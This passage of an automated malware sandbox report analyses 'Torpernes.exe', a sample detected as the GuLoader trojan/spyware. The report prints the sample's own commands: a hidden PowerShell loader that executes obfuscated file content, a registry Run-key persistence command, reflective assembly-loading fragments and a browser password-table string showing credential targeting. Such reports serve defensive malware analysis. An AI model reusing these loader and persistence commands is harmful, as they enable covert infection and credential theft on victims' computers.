            Source: Torpernes.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/11@4/4
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_004044C2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044C2
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
            Source: C:\Users\user\Desktop\Torpernes.exeFile created: C:\Users\user\AppData\Local\Temp\nsb2E4F.tmpJump to behavior
            Source: Torpernes.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Torpernes.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Contentious.exe, 00000006.00000002.2944378842.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002102D000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.000000002101E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\Torpernes.exeFile read: C:\Users\user\Desktop\Torpernes.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Torpernes.exe "C:\Users\user\Desktop\Torpernes.exe"
            Source: C:\Users\user\Desktop\Torpernes.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
            Source: C:\Users\user\Desktop\Torpernes.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"Jump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Torpernes.exeStatic file information: File size 1283968 > 1048576
            Source: Torpernes.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nedtllingers $Prfabrikationernes $Frugtbarhedsguden), (gongs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sanction = [AppDomain]::CurrentDomain.GetAssem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($manubaliste)), $Celluloidensonnering).DefineDynamicModule($Bairnteam, $false).DefineType($Kobjlde, $Receptionschefer, [System.Multicas
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Torpernes.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
            Source: C:\Users\user\Desktop\Torpernes.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"Jump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406183
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_3_001949CC push eax; iretd 6_3_001949CD
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB2890 push eax; retf 6_2_20CB2891
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB69A3 push 331320CBh; retf 6_2_20CB69B2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6AC3 pushad ; retf 6_2_20CB6AC6
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6AE9 push 687F20CBh; retf 6_2_20CB6AEE
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A89 push eax; retf 6_2_20CB6A8A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A8F push edx; retf 6_2_20CB6A92
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A8D push eax; retf 6_2_20CB6A8E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A9B push esi; retf 6_2_20CB6A9E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A93 push esi; retf 6_2_20CB6A9A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6AA1 push edi; retf 6_2_20CB6AA2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6A68 push 00000048h; retf 6_2_20CB6A6A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB1FBF push ds; retf 6_2_20CB1FC2
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB2F00 pushad ; iretd 6_2_20CB2F01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Contentious.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossingJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossingJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
